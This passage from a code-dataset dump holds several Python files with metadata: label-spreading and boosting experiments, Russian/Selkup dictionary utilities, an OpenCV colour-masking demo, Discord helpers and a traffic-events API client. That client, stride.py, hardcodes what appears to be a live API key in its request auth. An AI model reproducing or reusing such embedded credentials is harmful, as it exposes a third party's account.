"django.utils.timezone.now", "line_number": 26, "usage_type": "call"}, {"api_name": "django.utils.timezone", "line_number": 26, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 28, "usage_type": "call"}, {"api_name": "forms.PostForm", "line_number": 30, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 31, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 34, "usage_type": "call"}, {"api_name": "models.Post", "line_number": 34, "usage_type": "argument"}, {"api_name": "forms.PostForm", "line_number": 36, "usage_type": "call"}, {"api_name": "django.utils.timezone.now", "line_number": 40, "usage_type": "call"}, {"api_name": "django.utils.timezone", "line_number": 40, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 42, "usage_type": "call"}, {"api_name": "forms.PostForm", "line_number": 44, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 45, "usage_type": "call"}, {"api_name": "ff_espn_api.League", "line_number": 53, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 57, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 81, "usage_type": "call"}]} +{"seq_id": "98403909", "text": "from __future__ import division\n\nimport os\nimport pandas as pd\nimport numpy as np\n\nfrom gensim import corpora\nfrom gensim import models\nfrom gensim.matutils import corpus2dense as c2d\nfrom scipy.optimize import minimize\n\nfrom Mongolab import Mongolab\nfrom processing import flatten\nfrom sklearn.semi_supervised import LabelSpreading\nfrom sklearn.preprocessing import RobustScaler\nfrom TokenProcessor import TokenProcessor\nfrom functools import partial\n\nfrom ipdb import set_trace as st\n\ndef __encodeTokens(tokens, tfidf, dictionary):\n # Does the following things in 'one' pass:\n # 1. Converts plaintext word tokens to a bag-of-words representation\n # 2. Converts the BoW representation to a TF-IDF representation\n # 3. Converts the TF-IDF representation from a sparse matrix to a normal matrix\n # 4. Flattens out the array to remove conversion artifacts from (3)\n return flatten(c2d([tfidf[dictionary.doc2bow(tokens)]], len(tfidf.idfs), num_docs=1))\n\ndef __encodeLabel(label):\n if label == 'no_agreement':\n return -1\n elif label == '1 Little or No Disclosure':\n return 1\n elif label == '2 Superficial Disclosure':\n return 2\n elif label == '3 Conventional Disclosure':\n return 3\n elif label == '4 Personal Disclosure':\n return 4\n elif label == '5 Intimate Disclosure':\n return 5\n else:\n raise ValueError(label)\n\ndef __getWeightedLabels(ls, intLabels=True):\n # Take the weighted average of the labels\n # This is a shortcut for identifying the median value\n # because the label distributions are encoded as binarized vectors\n result = [np.average(ls.classes_, weights=p) for p in ls.label_distributions_]\n result = np.nan_to_num(result)\n\n if intLabels:\n # Round each element and cast to an int\n result = np.around(result).astype(int)\n\n return result\n\ndef __score(data):\n # Start by assuming everything is badly labeled\n numErrors = len(data)\n idErrors = []\n\n # SHAME: This goes through every row of the dataframe,\n # which sort of... violates the purpose of Pandas .___.\n for host_id, r in data.iterrows():\n label1, label2, labelSpread = r.label_1, r.label_2, r.label_spread\n minVal, maxVal = min(label1, label2), max(label1, label2)\n\n # Label is 'correct' if it's within the human prediction range\n if labelSpread >= minVal and labelSpread <= maxVal:\n numErrors-= 1\n else:\n idErrors.append(host_id)\n\n return numErrors, idErrors\n\ndef createLS(alpha, gamma, data):\n # Scale training data and extract labels\n rs = RobustScaler()\n scaledFeats = rs.fit_transform(data.feat_tokens.tolist())\n trainLabels = data.label_train.tolist()\n\n # Run label spreading operation\n ls = LabelSpreading(kernel='rbf', alpha=alpha, gamma=gamma, max_iter=10000)\n ls.fit(scaledFeats, trainLabels)\n\n # Vote on the classification outcome and inject\n # the 'final' result into the dataframe\n data.loc[:, 'label_spread'] = __getWeightedLabels(ls)\n\n return data, ls\n\ndef propagate(params, data):\n alpha, gamma = params[0], params[1]\n data, _ = createLS(alpha, gamma, data)\n\n # Score only labels with no agreement because the rest\n # would result in a score of 0 anyway\n score, _ = __score(data[data.Answer == 'no_agreement'])\n\n return score\n\ndef main(optimize=False, saveCsv=True):\n AMT_DATA_PATH = os.path.join(os.getcwd(), 'data_labels', 'Batch_2182142_batch_results.csv')\n\n mg = Mongolab()\n tp = TokenProcessor()\n\n # Get City Data\n cityData = mg.getData('ny_us')\n cityData = cityData[['host_id', 'host_is_superhost', 'property_type', 'room_type']]\n cityData.loc[:, 'cleaned_tokens'] = tp.get('ny_us')\n cityData.set_index('host_id', inplace=True)\n\n # Get AMT Results\n amtData = pd.read_csv(AMT_DATA_PATH, engine='c')\n amtData = amtData[['host_id', 'Answer1', 'Answer2', 'Answer']]\n amtData.set_index('host_id', inplace=True)\n\n # Merge both dataframes and intersect by host_id\n data = pd.merge(cityData, amtData, left_index=True, right_index=True, how='inner')\n\n # Don't need these things lying around anymore!\n del cityData\n del amtData\n\n # Create TF-IDF transformer for tokens\n tokens = data.cleaned_tokens.tolist()\n dictionary = corpora.Dictionary(tokens)\n tfidf = models.TfidfModel(dictionary.doc2bow(t) for t in tokens)\n\n # Encode tokens into word vectors\n encTokens = partial(__encodeTokens, tfidf=tfidf, dictionary=dictionary)\n data.loc[:, 'feat_tokens'] = data.cleaned_tokens.map(lambda d: encTokens(d))\n\n # Marshall label data\n data.loc[:, 'label_train'] = data.Answer.map(lambda d: __encodeLabel(d))\n data.loc[:, 'label_1'] = data.Answer1.map(lambda d: __encodeLabel(d))\n data.loc[:, 'label_2'] = data.Answer2.map(lambda d: __encodeLabel(d))\n\n if optimize:\n optFunc = partial(propagate, data=data)\n\n # Initial values use scikit-learn defaults for the label spreader\n initValues = [0.2, 10]\n\n # Run Truncated Newton optimization to find alpha and gamma\n # that minimize the number of unresolved labels after classification\n res = minimize(optFunc, initValues, bounds=((0, 1), (0, None)), method='TNC', options={'eps': 0.5, 'disp': True})\n\n if res.success:\n alpha, gamma = res.x\n else:\n # TODO: Throw error\n pass\n else:\n # Values precomputed from running the optimization function above\n alpha, gamma = [0.17278286, 3.18163529]\n\n # Create a final version of the label spreader\n data, ls = createLS(alpha, gamma, data)\n _, errorIdx = __score(data[data.Answer == 'no_agreement'])\n\n # Resolve remaining bad labels by majority voting\n cols = ['label_1', 'label_2', 'label_spread']\n data.loc[errorIdx, cols[2]] = data.loc[errorIdx, cols].apply(np.median, axis=1, raw=True)\n\n # Clean up the house\n finalData = data.loc[:, ['host_is_superhost', 'property_type', 'room_type', 'cleaned_tokens', 'label_spread']]\n finalData.rename(columns={'label_spread': 'labels'}, inplace=True)\n\n if saveCsv:\n OUTPUT_PATH = os.path.join(os.getcwd(), 'classifier', 'results.csv')\n finalData.to_csv(OUTPUT_PATH)\n\n return finalData\n\nif __name__ == '__main__':\n main()\n", "sub_path": "labels.py", "file_name": "labels.py", "file_ext": "py", "file_size_in_byte": 6312, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "processing.flatten", "line_number": 27, "usage_type": "call"}, {"api_name": "gensim.matutils.corpus2dense", "line_number": 27, "usage_type": "call"}, {"api_name": "numpy.average", "line_number": 49, "usage_type": "call"}, {"api_name": "numpy.nan_to_num", "line_number": 50, "usage_type": "call"}, {"api_name": "numpy.around", "line_number": 54, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.RobustScaler", "line_number": 79, "usage_type": "call"}, {"api_name": "sklearn.semi_supervised.LabelSpreading", "line_number": 84, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 104, "usage_type": "call"}, {"api_name": "os.path", "line_number": 104, "usage_type": "attribute"}, {"api_name": "os.getcwd", "line_number": 104, "usage_type": "call"}, {"api_name": "Mongolab.Mongolab", "line_number": 106, "usage_type": "call"}, {"api_name": "TokenProcessor.TokenProcessor", "line_number": 107, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 116, "usage_type": "call"}, {"api_name": "pandas.merge", "line_number": 121, "usage_type": "call"}, {"api_name": "gensim.corpora.Dictionary", "line_number": 129, "usage_type": "call"}, {"api_name": "gensim.corpora", "line_number": 129, "usage_type": "name"}, {"api_name": "gensim.models.TfidfModel", "line_number": 130, "usage_type": "call"}, {"api_name": "gensim.models", "line_number": 130, "usage_type": "name"}, {"api_name": "functools.partial", "line_number": 133, "usage_type": "call"}, {"api_name": "functools.partial", "line_number": 142, "usage_type": "call"}, {"api_name": "scipy.optimize.minimize", "line_number": 149, "usage_type": "call"}, {"api_name": "numpy.median", "line_number": 166, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 173, "usage_type": "call"}, {"api_name": "os.path", "line_number": 173, "usage_type": "attribute"}, {"api_name": "os.getcwd", "line_number": 173, "usage_type": "call"}]} +{"seq_id": "14520626", "text": "#!/usr/bin/python3\n# -*- coding: utf-8 -*\nimport codecs\nimport pymorphy2\nimport web_utils\nimport html_utils\nimport dictionary_utils\nimport os\n\n__author__ = \"gisly\"\n\nmorph = pymorphy2.MorphAnalyzer()\nYAT_WORDS = 'dictionaries/resources/yat_words.txt'\nYAT = 'ѣ'\nOUT_OF_VOC_WORDS = None\n\nOUT_OF_VOC_WORDS_FILENAME = 'dictionaries/resources/out_of_voc_words.txt'\n\nOLD_SPELLINGS = None\nOLD_SPELLINGS_FILENAME = 'dictionaries/resources/old_spellings.txt'\nOLD_SPELLING_DELIMITER = ':'\n\nSELKUP_SITE_URL = 'http://selkup.org/dict-search'\nSELKUP_INF_ENDING = 'гу'\n\nPYMORPHY_INF = 'INFN'\n\nSUFFIX_LIST = ['-ка', '-то']\nPREFIX_LIST = ['по-']\n\nRUSSIAN_ALPHABET = 'абвгдеёжзийклмнопрстуфхцчшщъыьэюя'\nSELKUP_ALPHABET = 'абвгдеёжзийклмнопрстуфхцчшщъыьэюяё̄е̄ы̄ӧӧ̄о̄ю̈ю̈̄ю̄я̄ӭӭ̄э̄ӓӓ̄āӱӱ̄ӯи̇и̇̄ӣдзӷӄӈҗҳҷ́'\nENGLISH_ALPHABET = 'abcdefghijklmnopqrstuvwxyz\\'‘'\nSPECIAL_CHARACTERS = '.,!\\?«»: –-\"’'\n\n\nTYPICAL_LENGTH = 20\n\ndef has_correct_characters(sentence, language_code):\n if language_code == 'rus':\n alphabet = RUSSIAN_ALPHABET + SPECIAL_CHARACTERS\n elif language_code == 'slk':\n alphabet = SELKUP_ALPHABET + SPECIAL_CHARACTERS\n elif language_code == 'en':\n alphabet = ENGLISH_ALPHABET + SPECIAL_CHARACTERS\n else:\n raise Exception('Unknown language code : %s' % language_code)\n sentence = sentence.lower()\n for letter in sentence:\n if letter not in alphabet:\n print(letter)\n return False\n return True\n\ndef check_pymorphy(word):\n cache_dictionaries()\n word_list = word.split(' ')\n for word_part in word_list:\n if not check_pymorphy_single(word_part):\n return False\n return True\n\ndef check_selkup_word(word, translation):\n CHECK_FUNCTIONS = [check_pos]\n\n for check_function in CHECK_FUNCTIONS:\n if not check_function(word, translation):\n return False\n return True\n\ndef check_dictionary(word, translation):\n rus_translation_str = ' '.join(translation)\n #selkup_from_dict_list = get_selkup_from_dictionary(rus_translation_str)\n selkup_from_dict_list = dictionary_utils.get_selkup_by_meaning(rus_translation_str)\n for selkup_from_dict in selkup_from_dict_list:\n if is_similar(word, selkup_from_dict):\n return True\n print(word, selkup_from_dict)\n return False\n\ndef check_pos(word, translation):\n for translation_part in translation:\n if is_infinitive(translation_part) and word.endswith('ту'):\n return False\n return True\n\ndef check_length(word, translation):\n return len(word) <= TYPICAL_LENGTH\n\n\n\ndef get_selkup_from_dictionary(translation):\n data = web_utils.get_url_data(SELKUP_SITE_URL, 'utf-8', {'word': translation,\n 'lemma': '1',\n 'lang': 'ru', })\n\n html_data = html_utils.transform_to_html(data)\n search_result = html_utils.get_first_html_tag(html_data, 'ol')\n res = []\n for element in search_result:\n children = element.xpath('child::node()')\n if children and not 'не найдено' in children[0]:\n res.append(children[0].text)\n return res\n\n\ndef is_similar(word1, word2):\n #TODO\n return word1.strip().lower() == word2.strip().lower()\n\ndef check_pymorphy_single(word):\n word = word.replace('́', '')\n if check_pymorphy_dict(word):\n return True\n for suffix in SUFFIX_LIST:\n if word.endswith(suffix) and check_pymorphy_dict(word[0:-len(suffix)]):\n return True\n\n for prefix in PREFIX_LIST:\n if word.startswith(prefix) and check_pymorphy_dict(word[len(prefix):]):\n return True\n return False\n\n\ndef check_pymorphy_dict(word):\n if word.lower() in OUT_OF_VOC_WORDS:\n return True\n return morph.parse(word)[0].is_known\n\ndef is_infinitive(word):\n morph_parse_results = morph.parse(word)\n for morph_parse_result in morph_parse_results:\n tag = morph_parse_result.tag\n if tag.POS == PYMORPHY_INF:\n return True\n return False\n\n\ndef change_old_spellings(word):\n for old_spelling in OLD_SPELLINGS.items():\n word = word.replace(old_spelling[0], old_spelling[1])\n return word\n\ndef cache_dictionaries():\n cache_out_of_voc_words()\n cache_old_spellings()\n\ndef cache_out_of_voc_words():\n global OUT_OF_VOC_WORDS\n if OUT_OF_VOC_WORDS is None:\n OUT_OF_VOC_WORDS = set()\n with codecs.open(OUT_OF_VOC_WORDS_FILENAME, 'r', 'utf-8') as fin:\n for line in fin:\n OUT_OF_VOC_WORDS.add(line.strip().lower())\n\n\ndef cache_old_spellings():\n global OLD_SPELLINGS\n if OLD_SPELLINGS is None:\n OLD_SPELLINGS = dict()\n with codecs.open(OLD_SPELLINGS_FILENAME, 'r', 'utf-8') as fin:\n for line in fin:\n parts = line.strip().lower().split(OLD_SPELLING_DELIMITER)\n OLD_SPELLINGS[parts[0]] = parts[1]\n", "sub_path": "dictionaries/language_utils.py", "file_name": "language_utils.py", "file_ext": "py", "file_size_in_byte": 5074, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "pymorphy2.MorphAnalyzer", "line_number": 12, "usage_type": "call"}, {"api_name": "dictionary_utils.get_selkup_by_meaning", "line_number": 74, "usage_type": "call"}, {"api_name": "web_utils.get_url_data", "line_number": 93, "usage_type": "call"}, {"api_name": "html_utils.transform_to_html", "line_number": 97, "usage_type": "call"}, {"api_name": "html_utils.get_first_html_tag", "line_number": 98, "usage_type": "call"}, {"api_name": "codecs.open", "line_number": 152, "usage_type": "call"}, {"api_name": "codecs.open", "line_number": 161, "usage_type": "call"}]} +{"seq_id": "489249189", "text": "import sys, os, time\nsys.path.insert(0, os.path.join(os.path.dirname(__file__),'libs'))\nimport requests\nimport xml.etree.ElementTree as ET\n\ndef output_text(msg):\n\tfor char in msg:\n\t\tsys.stdout.write ( '%s' % char)\n\t\tsys.stdout.flush()\n\t\ttime.sleep(0.05)\n\t#print ''\n\ndef fetchURL(lat,lon,radius):\n\tpayload = {'near': str(lat) + ',' + str(lon) + ',' + str(radius)}\n\trequesturl='http://api.stride-project.com/events/feeds/d38a9c31-3156-446e-a89e-79aa3d7357c2/datastreams/1/events'\n\tr = requests.get(requesturl, params=payload, auth=('7b399134-f740-4432-9a3e-f6d711473558', ''))\n\treturn r\n\ndef parseData(lon, lat, radius):\n\tdata = fetchURL(lon, lat, radius)\n\tparsedXML = ET.fromstring(data.text)\n\tevents=[]\n\tfor x in range(10):\n\t\ttry:\n\t\t\tid = parsedXML[x].text\n\t\t\tdescrip = parsedXML[x][5][5].text\n\t\t\turgency = parsedXML[x][5][2].text\n\t\t\tseverity = parsedXML[x][5][3].text\n\t\t\tcertainty = parsedXML[x][5][4].text\n\t\t\tlatlong = parsedXML[x][5][9][0].text\n\t\t\troad = parsedXML[x][5][9][5].text\n\t\t\tdirection = parsedXML[x][5][9][4].text\n\t\t\tintersection = parsedXML[x][5][9][1].text\n\t\t\tevents.append({'id': id, 'descrip': descrip, 'urgency' : urgency, 'severity': severity, 'certainty':certainty, 'latlong' : latlong, 'road': road, 'direction': direction, 'intersection' : intersection})\n\t\texcept IndexError:\n\t\t\tpass\n\t\treturn events\n\n#currentEvents = parseData(52.211604, 0.09166, 10000)\n\ndef outputMessage():\n\tfor event in currentEvents:\n\t\tmessage = 'There is a ' + event['severity'] + ' problem on the ' + event['road'] + ' ' + event['direction'] + ' near ' + event['intersection'] + '.\\n' + event['descrip']\n\t\toutput_text(message)\n", "sub_path": "frontend/stride.py", "file_name": "stride.py", "file_ext": "py", "file_size_in_byte": 1627, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "sys.path.insert", "line_number": 2, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 2, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 2, "usage_type": "call"}, {"api_name": "os.path", "line_number": 2, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 2, "usage_type": "call"}, {"api_name": "sys.stdout.write", "line_number": 8, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 8, "usage_type": "attribute"}, {"api_name": "sys.stdout.flush", "line_number": 9, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 9, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 10, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 16, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree.fromstring", "line_number": 21, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 21, "usage_type": "name"}]} +{"seq_id": "74217860", "text": "# Creating a perceptron using scikit_learn's Perceptron class and the iris dataset\n\nimport matplotlib.pyplot as plt\nfrom sklearn.linear_model import Perceptron\nfrom iris_common_funcs import plot_decision_regions, initializer\n\n\nX_train_std, y_train, X_combined_std, y_combined = initializer()\nppn = Perceptron(max_iter=40, eta0=0.1, random_state=0).fit(X_train_std, y_train)\nplot_decision_regions(X=X_combined_std, y=y_combined, classifier=ppn, test_idx=range(105, 150))\n\nplt.xlabel(\"Sepal length (standardized)\")\nplt.ylabel(\"Petal length (standardized)\")\nplt.legend(loc='upper left')\nplt.show()", "sub_path": "Iris/iris_perceptron.py", "file_name": "iris_perceptron.py", "file_ext": "py", "file_size_in_byte": 594, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "iris_common_funcs.initializer", "line_number": 8, "usage_type": "call"}, {"api_name": "sklearn.linear_model.Perceptron", "line_number": 9, "usage_type": "call"}, {"api_name": "iris_common_funcs.plot_decision_regions", "line_number": 10, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 12, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 12, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 13, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 13, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 14, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 14, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 15, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 15, "usage_type": "name"}]} +{"seq_id": "216388313", "text": "import cv2\n\nsrc = cv2.imread('inRange.jpg')\n# size 축소\nsrc = cv2.resize(src, (0, 0), fx=0.5, fy=0.5, interpolation=cv2.INTER_NEAREST)\n\nsrc_hsv = cv2.cvtColor(src, cv2.COLOR_BGR2HSV)\n\n# 0 < B < 100 , 128 < G < 255 , 0 < R < 100\ndst1 = cv2.inRange(src, (0, 128, 0), (100, 255, 100))\nimg_result = cv2.bitwise_and(src_hsv, src_hsv, mask = dst1)\n\ndst2 = cv2.inRange(src_hsv, (50, 150, 0), (80, 255, 255))\nimg_result2 = cv2.bitwise_and(src_hsv, src_hsv, mask = dst2)\n\ncv2.imshow('src', src)\ncv2.moveWindow('src',400,100)\n\ncv2.imshow('dst1', dst1)\ncv2.moveWindow('dst1',400,450)\n\ncv2.imshow('img_result', img_result)\ncv2.moveWindow('img_result',800,450)\n\n\ncv2.imshow('dst2', dst2)\ncv2.moveWindow('dst2',400,800)\n\n\ncv2.imshow('img_result2', img_result2)\ncv2.moveWindow('img_result2',1100,450)\n\ncv2.waitKey()\ncv2.destroyAllWindows()\n", "sub_path": "inRange02.py", "file_name": "inRange02.py", "file_ext": "py", "file_size_in_byte": 830, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "cv2.imread", "line_number": 3, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 5, "usage_type": "call"}, {"api_name": "cv2.INTER_NEAREST", "line_number": 5, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 7, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2HSV", "line_number": 7, "usage_type": "attribute"}, {"api_name": "cv2.inRange", "line_number": 10, "usage_type": "call"}, {"api_name": "cv2.bitwise_and", "line_number": 11, "usage_type": "call"}, {"api_name": "cv2.inRange", "line_number": 13, "usage_type": "call"}, {"api_name": "cv2.bitwise_and", "line_number": 14, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 16, "usage_type": "call"}, {"api_name": "cv2.moveWindow", "line_number": 17, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 19, "usage_type": "call"}, {"api_name": "cv2.moveWindow", "line_number": 20, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 22, "usage_type": "call"}, {"api_name": "cv2.moveWindow", "line_number": 23, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 26, "usage_type": "call"}, {"api_name": "cv2.moveWindow", "line_number": 27, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 30, "usage_type": "call"}, {"api_name": "cv2.moveWindow", "line_number": 31, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 33, "usage_type": "call"}, {"api_name": "cv2.destroyAllWindows", "line_number": 34, "usage_type": "call"}]} +{"seq_id": "52516952", "text": "# contains:\n#\t - general helpers\n#\t - discord helpers\n\n\n# GENERAL HELPERS #\n\nimport os\nimport json\nimport time\n\ndef file_contents( file, silent=False ):\n\tencodings = [ 'utf-8', 'latin1' ]\n\tfor e in encodings:\n\t\ttry:\n\t\t\tif not os.path.isfile( file ):\n\t\t\t\tif not silent:\n\t\t\t\t\tprint( 'file not found: ' + file )\n\t\t\t\treturn ''\n\t\t\t\t\n\t\t\twith open( file, 'r', encoding=e ) as f:\n\t\t\t\toutput = f.read()\n\t\t\t\tf.close()\n\t\t\t\treturn output\n\t\texcept UnicodeDecodeError:\n\t\t\tprint( 'decode error: ' + file )\n\t\t\treturn ''\n\t\telse:\n\t\t\tprint( 'unknown error: ' + file )\n\t\t\treturn ''\n\ndef is_json( data, fn='unknown file' ):\n\ttry:\n\t\tjson_object = json.loads( data )\n\texcept ValueError:\n\t\tprint( 'invalid json in ' + fn )\n\t\treturn False\n\treturn True\n\t\ndef load_json( file, silent=False ):\n\ttext = file_contents( file, silent )\n\tif text == '' or is_json( text, file ) == False:\n\t\treturn {}\n\treturn json.loads( text )\n\t\ndef file_write( file, data ):\n\tf = open( file, 'w' )\n\tf.write( data )\n\tf.close()\n\t\ndef pretty_date( d ):\n\tif d == 0:\n\t\treturn 'never'\n\ts = time.time() - d\n\tday = 86400\n\tif s > day * 1:\n\t\treturn '%d days ago' % round( s / day )\n\telif s <= 70:\n\t\treturn 'just now'\n\telif s < 120:\n\t\treturn '1 minute ago'\n\telif s < 3600:\n\t\treturn '%s minutes ago' % round( s / 60 )\n\telif s < 7200:\n\t\treturn '1 hour ago'\n\telse:\n\t\treturn '%s hours ago' % round( s / 3600 )\n\t\t\ndef module_exists( module_name ):\n try:\n __import__( module_name )\n except ImportError:\n return False\n else:\n return True\n\t\n\n# DISCORD HELPERS #\n\t\nimport discord\nfrom discord.ext import commands\nimport settings\n\t\t\t\ndef is_owner( ctx ):\n\tif ctx.message.author.id == settings.config['owner_id']:\n\t\treturn True\n\treturn False\n\t\t\t\ndef needs_owner():\n\treturn commands.check( is_owner )\n\t\ndef is_admin( ctx ):\n\tif is_owner( ctx ):\n\t\treturn True\n\tif ctx.message.channel.is_private:\n\t\treturn False\n\trole = discord.utils.find( lambda r: r.name == settings.config['admin_role'], ctx.message.author.roles )\n\treturn role is not None\n\t\t\t\ndef needs_admin():\n\treturn commands.check( is_admin )\n", "sub_path": "helper.py", "file_name": "helper.py", "file_ext": "py", "file_size_in_byte": 2058, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "os.path.isfile", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path", "line_number": 16, "usage_type": "attribute"}, {"api_name": "json.loads", "line_number": 34, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 44, "usage_type": "call"}, {"api_name": "time.time", "line_number": 54, "usage_type": "call"}, {"api_name": "settings.config", "line_number": 85, "usage_type": "attribute"}, {"api_name": "discord.ext.commands.check", "line_number": 90, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 90, "usage_type": "name"}, {"api_name": "discord.utils.find", "line_number": 97, "usage_type": "call"}, {"api_name": "discord.utils", "line_number": 97, "usage_type": "attribute"}, {"api_name": "settings.config", "line_number": 97, "usage_type": "attribute"}, {"api_name": "discord.ext.commands.check", "line_number": 101, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 101, "usage_type": "name"}]} +{"seq_id": "559774040", "text": "from numpy import *\nimport numpy as np\nimport json\nimport sys\nimport DecisionTree as dt\n\n\ndef getArgs():\n if len(sys.argv) == 4:\n clsfr = str(sys.argv[1])\n train = str(sys.argv[2])\n test = str(sys.argv[3])\n else:\n sys.exit('Illegal Arg Exception')\n return train, test, clsfr\n\n\ndef loadData(fileName):\n feature = []\n with open(fileName, 'r') as write_file:\n data = json.load(write_file)\n metadata = np.array(data['metadata']['features'])\n for b in data['metadata']['features']:\n feature.append(b[1])\n return np.array(data['data']), metadata, np.array(feature)\n\n\ndef learner(train_data, T, depth):\n mytree = dt.DecisionTree()\n total_predict_y = []\n m = len(train_data)\n n_test = len(test_data)\n training_sample_indices = np.zeros((T, m)).astype(int)\n\n test_output = np.zeros((T, n_test, len(classes)))\n\n for i in range(T):\n training_sample_indices[i] = np.random.choice(m, m, replace=True)\n training_samples = train_data[training_sample_indices[i], :]\n\n trainX = training_samples[:, :-1]\n trainy = training_samples[:, -1]\n mytree.fit(trainX, trainy, training_metadata, max_depth=depth)\n predicted_y = mytree.predict(test_X, prob=True)\n test_output[i] = predicted_y\n\n avg_prob = np.average(test_output, axis=0)\n actual = test_y\n predictions = np.zeros(n_test).astype(object)\n\n for i in range(len(test_data)):\n for j in range(T):\n tree_pred_idx = np.argmax(test_output[j, i, :])\n tree_pred = classes[tree_pred_idx]\n\n pred_idx = np.argmax(avg_prob[i, :])\n predictions[i] = classes[pred_idx]\n\n acc = (predictions == test_y).sum() / n_test\n return acc\n\n\ndef adaboost_classifier(train_x, train_y, test_x, test_y, T, depth):\n n_train = len(train_x)\n n_test = len(test_x)\n k = len(classes)\n mytree = dt.DecisionTree()\n\n wts = np.zeros((n_train, T + 1))\n wts[:, 0] = 1 / n_train\n pred_test = np.zeros((n_test, T + 2)).astype(object)\n alpha = np.zeros(T)\n for i in range(T):\n mytree.fit(train_x, train_y, training_metadata, depth, wts[:, i])\n predictions_y = mytree.predict(train_x)\n err = 0\n # compute weights\n for j in range(n_train):\n if predictions_y[j] != train_y[j]:\n err += wts[j, i]\n # break the loop based on error criteria\n if err >= (1 - (1/k)):\n break\n\n alpha[i] = np.log((1 - err)/err) + np.log(k-1)\n\n for j in range(n_train):\n if predictions_y[j] != train_y[j]:\n wts[j, i+1] = wts[j, i] * np.exp(alpha[i])\n else:\n wts[j, i+1] = wts[j, i]\n # normalize\n wts[:, i+1] = [x / sum(wts[:, i+1]) for x in wts[:, i+1]]\n pred_test[:, i] = mytree.predict(test_x)\n\n pred_test[:, -1] = test_y\n\n\n alphas = np.zeros(k)\n correct = 0\n for i in range(n_test):\n for cls_idx, cls in enumerate(classes):\n idxs = np.argwhere(pred_test[i, :-2] == cls)\n alphas[cls_idx] = len(idxs) * alpha[idxs].sum()\n pred_test[i, -2] = classes[np.argmax(alphas)]\n if pred_test[i, -2] == pred_test[i, -1]:\n correct += 1\n\n actual = pred_test[:, -1]\n predictions = pred_test[:, -2]\n\n # accuracy\n acc = correct/n_test\n\n return acc\n\n\nnp.random.seed(0)\ntraining_set, test_set, clsfr = getArgs()\ntraining_data, training_metadata, feature_range = loadData(training_set)\nclasses = feature_range[-1]\nfeatures = training_metadata[0:-1, 0]\nfeature_types = training_metadata[0:-1, 1]\ntrain_labels = np.array(training_data[:, -1])\ntrain_X = training_data[:, :-1]\ntrain_y = training_data[:, -1]\n\ntest_data, test_metadata, feature_range_test = loadData(test_set)\ntest_data = np.array(test_data)\ntest_X = test_data[:, :-1]\ntest_y = test_data[:, -1].astype(object)\n\nk = len(classes)\nconfusion_matrix = np.zeros((k,k)).astype(int)\nactual = []\npredicted = []\nif clsfr == \"bag\":\n for i in range(1, 11):\n accuracy = learner(training_data, i, 12)\n print(accuracy)\nelse:\n for i in range(1, 11):\n accuracy = adaboost_classifier(train_X, train_y, test_X, test_y, i, 12)\n print(accuracy)\n\n\n\n", "sub_path": "graph.py", "file_name": "graph.py", "file_ext": "py", "file_size_in_byte": 4256, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "sys.argv", "line_number": 9, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 10, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 11, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 12, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 14, "usage_type": "call"}, {"api_name": "json.load", "line_number": 21, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 22, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 25, "usage_type": "call"}, {"api_name": "DecisionTree.DecisionTree", "line_number": 